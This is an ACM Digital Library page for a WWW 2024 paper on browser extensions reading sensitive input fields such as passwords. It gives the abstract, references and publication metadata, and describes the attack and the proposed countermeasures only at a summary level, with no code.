Experimental Security Analysis of Sensitive Data Access by Browser Extensions
Pages 1283 - 1294
Abstract
Browser extensions offer a variety of valuable features and functionalities. They also pose a significant security risk if not properly designed or reviewed. Prior works have shown that browser extensions can access and manipulate data fields, including sensitive data such as passwords, credit card numbers, and Social Security numbers. In this paper, we present an empirical study of the security risks posed by browser extensions. Specifically, we first build a proof-of-concept extension that can steal sensitive user information. We find that the extension passes the Chrome Webstore review process. We then perform a measurement study on the top 10K website login pages to check if the extension access to password fields via JS. We find that none of the password fields are actively protected, and can be accessed using JS. Moreover, we found that 1K websites store passwords in plaintext in their page source, including popular websites like Google.com and Cloudflare.com. We also analyzed over 160K Chrome Web Store extensions for malicious behavior, finding that 28K have permission to access sensitive fields and 190 store password fields in variables. To analyze the behavioral workflow of the potentially malicious extensions, we propose an LLM-driven framework, Extension Reviewer. Finally, we discuss two countermeasures to address these risks: a bolt-on JavaScript package for immediate adoption by website developers allowing them to protect sensitive input fields, and a browser-level solution that alerts users when an extension accesses sensitive input fields. Our research highlights the urgent need for improved security measures to protect sensitive user information online.
Supplemental Material
MP4 File
video presentation
- Download
- 1454.47 MB
MP4 File
Supplemental video
- Download
- 158.76 MB
References
[1]
Ömer Aslan Aslan and Refik Samet. 2020. A comprehensive review on malware detection approaches. IEEE access, Vol. 8 (2020), 6249--6271.
[2]
Lujo Bauer, Shaoying Cai, Limin Jia, Timothy Passaro, and Yuan Tian. 2014. Analyzing the dangers posed by Chrome extensions. In 2014 IEEE Conference on Communications and Network Security. 184--192. https://doi.org/10.1109/CNS.2014.6997485
[3]
Nicholas Carlini, Adrienne Porter Felt, and David Wagner. 2012. An Evaluation of the Google Chrome Extension Security Architecture. (Aug. 2012), 97--111. https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/carlini
[4]
Harrison Chase. 2022. LangChain. https://github.com/langchain-ai/langchain
[5]
Quan Chen and Alexandros Kapravelos. 2018. Mystique: Uncovering Information Leakage from Browser Extensions. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security (Toronto, Canada) (CCS '18). Association for Computing Machinery, New York, NY, USA, 1687--1700. https://doi.org/10.1145/3243734.3243823
[6]
Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, and Nektarios Leontiadis. 2017. Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser. (Aug. 2017). https://www.usenix.org/conference/cset17/workshop-program/presentation/dekoven
[7]
Benjamin Eriksson, Pablo Picazo-Sanchez, and Andrei Sabelfeld. 2022. Hardening the Security Analysis of Browser Extensions. In Proceedings of the 37th ACM/SIGAPP Symposium on Applied Computing (Virtual Event) (SAC '22). Association for Computing Machinery, New York, NY, USA, 1694--1703. https://doi.org/10.1145/3477314.3507098
[8]
Yao Fu, Hao Peng, Ashish Sabharwal, Peter Clark, and Tushar Khot. 2022. Complexity-based prompting for multi-step reasoning. arXiv preprint arXiv:2210.00720 (2022).
[9]
Google. 2023. Overview of Manifest V3. https://developer.chrome.com/docs/extensions/mv3/intro/mv3-overview/.
[10]
Arjun Guha, Matt Fredrikson, Benjamin Livshits, and Nikhil Swamy. 2011. Verified Security for Browser Extensions. 2011 IEEE Symposium on Security and Privacy (2011), 115--130.
[11]
Alexandros Kapravelos, Chris Grier, Neha Chachra, Christopher Kruegel, Giovanni Vigna, and Vern Paxson. 2014. Hulk: Eliciting Malicious Behavior in Browser Extensions. (Aug. 2014), 641--654. https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/kapravelos
[12]
Rishabh Khandelwal, Asmit Nayak, Hamza Harkous, and Kassem Fawaz. 2022. CookieEnforcer: Automated Cookie Notice Analysis and Enforcement. ArXiv, Vol. abs/2204.04221 (2022).
[13]
J Richard Landis and Gary G Koch. 1977. The measurement of observer agreement for categorical data. biometrics (1977), 159--174.
[14]
Haonan Li, Yu Hao, Yizhuo Zhai, and Zhiyun Qian. 2023. The Hitchhiker's Guide to Program Analysis: A Journey with Large Language Models. arXiv preprint arXiv:2308.00245 (2023).
[15]
Lei Liu, Xinwen Zhang, Guanhua Yan, and Songqing Chen. 2012. Chrome Extensions: Threat Analysis and Countermeasures. In Network and Distributed System Security Symposium.
[16]
Mike Ter Louw, Jin Soon Lim, and Venkat Venkatakrishnan. 2008. Enhancing web browser security against malware extensions. Journal in Computer Virology, Vol. 4 (2008), 179--195.
[17]
Charlie Obimbo, Yong Zhou, and Randy Nguyen. 2018. Analysis of Vulnerabilities of Web Browser Extensions. In 2018 International Conference on Computational Science and Computational Intelligence (CSCI). 116--119. https://doi.org/10.1109/CSCI46756.2018.00029
[18]
Rangeet Pan, Ali Reza Ibrahimzada, Rahul Krishna, Divya Sankar, Lambert Pouguem Wassi, Michele Merler, Boris Sobolev, Raju Pavuluri, Saurabh Sinha, and Reyhaneh Jabbarvand. 2023. Understanding the Effectiveness of Large Language Models in Code Translation. arXiv preprint arXiv:2308.03109 (2023).
[19]
Kexin Pei, David Bieber, Kensen Shi, Charles Sutton, and Pengcheng Yin. 2023. Can Large Language Models Reason about Program Invariants? (2023).
[20]
Raffaello Perrotta and Feng Hao. 2018. Botnet in the Browser: Understanding Threats Caused by Malicious Browser Extensions. IEEE Security & Privacy, Vol. 16, 4 (2018), 66--81. https://doi.org/10.1109/MSP.2018.3111249
[21]
Sami Sarsa, Paul Denny, Arto Hellas, and Juho Leinonen. 2022. Automatic generation of programming exercises and code explanations using large language models. In Proceedings of the 2022 ACM Conference on International Computing Education Research-Volume 1. 27--43.
[22]
Max Sch"afer, Sarah Nadi, Aryaz Eghbali, and Frank Tip. 2023. Adaptive test generation using a large language model. arXiv preprint arXiv:2302.06527 (2023).
[23]
Hossain Shahriar, Komminist Weldemariam, Mohammad Zulkernine, and Thibaud Lutellier. 2014. Effective Detection of Vulnerable and Malicious Browser Extensions. Computers & Security, Vol. 47 (11 2014), 66--84. https://doi.org/10.1016/j.cose.2014.06.005
[24]
Dolière Francis Somé. 2019. EmPoWeb: empowering web applications with browser extensions. In 2019 IEEE Symposium on Security and Privacy (SP). IEEE, 227--245.
[25]
Ehsan Toreini, Maryam Mehrnezhad, Siamak Fayyaz Shahandashti, and Feng Hao. 2019. DOMtegrity: ensuring web page integrity against malicious browser extensions. International Journal of Information Security, Vol. 18 (2019), 801 -- 814.
[26]
Gaurav Varshney, Manoj Misra, and Pradeep Atrey. 2017. Detecting Spying and Fraud Browser Extensions: Short Paper. 45--52. https://doi.org/10.1145/3137616.3137619
[27]
Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Łukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. Advances in neural information processing systems, Vol. 30 (2017).
[28]
Junjie Wang, Yuchao Huang, Chunyang Chen, Zhe Liu, Song Wang, and Qing Wang. 2023 a. Software testing with large language model: Survey, landscape, and vision. arXiv preprint arXiv:2307.07221 (2023).
[29]
Jiangang Wang, Xiaohong Li, Xuhui Liu, Xinshu Dong, Junjie Wang, Zhenkai Liang, and Zhiyong Feng. 2012. An Empirical Study of Dangerous Behaviors in Firefox Extensions. 188--203. https://doi.org/10.1007/978--3--642--33383--5_12
[30]
Yao Wang, Wandong Cai, Pin Lyu, and Wei Shao. 2018a. A Combined Static and Dynamic Analysis Approach to Detect Malicious Browser Extensions. Security and Communication Networks, Vol. 2018 (05 2018), 1--16. https://doi.org/10.1155/2018/7087239
[31]
Yao Wang, Wandong Cai, Pin Lyu, and Wei Shao. 2018b. A combined static and dynamic analysis approach to detect malicious browser extensions. Security and Communication Networks, Vol. 2018 (2018).
[32]
Yue Wang, Hung Le, Akhilesh Deepak Gotmare, Nghi DQ Bui, Junnan Li, and Steven CH Hoi. 2023 b. Codet5: Open code large language models for code understanding and generation. arXiv preprint arXiv:2305.07922 (2023).
[33]
Jason Wei, Xuezhi Wang, Dale Schuurmans, Maarten Bosma, Fei Xia, Ed Chi, Quoc V Le, Denny Zhou, et al. 2022. Chain-of-thought prompting elicits reasoning in large language models. Advances in Neural Information Processing Systems, Vol. 35 (2022), 24824--24837.
[34]
Xiangzhe Xu, Zhuo Zhang, Shiwei Feng, Yapeng Ye, Zian Su, Nan Jiang, Siyuan Cheng, Lin Tan, and Xiangyu Zhang. 2023. LmPa: Improving Decompilation by Synergy of Large Language Model and Program Analysis. arXiv preprint arXiv:2306.02546 (2023).
[35]
Rui Zhao, Chuan Yue, and Qing Yi. 2015. Automatic Detection of Information Leakage Vulnerabilities in Browser Extensions. In Proceedings of the 24th International Conference on World Wide Web (Florence, Italy) (WWW '15). International World Wide Web Conferences Steering Committee, Republic and Canton of Geneva, CHE, 1384--1394. https://doi.org/10.1145/2736277.2741134
[36]
Wayne Xin Zhao, Kun Zhou, Junyi Li, Tianyi Tang, Xiaolei Wang, Yupeng Hou, Yingqian Min, Beichen Zhang, Junjie Zhang, Zican Dong, et al. 2023. A survey of large language models. arXiv preprint arXiv:2303.18223 (2023). io
Index Terms
- Experimental Security Analysis of Sensitive Data Access by Browser Extensions
Recommendations
Hardening the security analysis of browser extensions
SAC '22: Proceedings of the 37th ACM/SIGAPP Symposium on Applied ComputingBrowser extensions boost the browsing experience by a range of features from automatic translation and grammar correction to password management, ad blocking, and remote desktops. Yet the power of extensions poses significant privacy and security ...
Discovering Browser Extensions via Web Accessible Resources
CODASPY '17: Proceedings of the Seventh ACM on Conference on Data and Application Security and PrivacyBrowser extensions provide a powerful platform to enrich browsing experience. At the same time, they raise important security questions. From the point of view of a website, some browser extensions are invasive, removing intended features and adding ...
After you, please: browser extensions order attacks and countermeasures
AbstractBrowser extensions are small applications executed in the browser context that provide additional capabilities and enrich the user experience while surfing the web. The acceptance of extensions in current browsers is unquestionable. For instance, ...
Comments
Information & Contributors
Information
Published In
May 2024
4826 pages
ISBN:9798400701719
DOI:10.1145/3589334
- General Chairs:
- Tat-Seng Chua,
- Chong-Wah Ngo,
- Proceedings Chair:
- Roy Ka-Wei Lee,
- Program Chairs:
- Ravi Kumar,
- Hady W. Lauw
Copyright © 2024 Owner/Author.
This work is licensed under a Creative Commons Attribution-NonCommercial International 4.0 License.
Sponsors
Publisher
Association for Computing Machinery
New York, NY, United States
Publication History
Published: 13 May 2024
Check for updates
Author Tags
Qualifiers
- Research-article
Funding Sources
Conference
WWW '24
Sponsor:
Acceptance Rates
Overall Acceptance Rate 1,899 of 8,196 submissions, 23%
Contributors
Other Metrics
Bibliometrics & Citations
Bibliometrics
Article Metrics
- 0Total Citations
- 564Total Downloads
- Downloads (Last 12 months)564
- Downloads (Last 6 weeks)68
Reflects downloads up to 05 Mar 2025
Other Metrics
Citations
View Options
Login options
Check if you have access through your login credentials or your institution to get full access on this article.
Sign in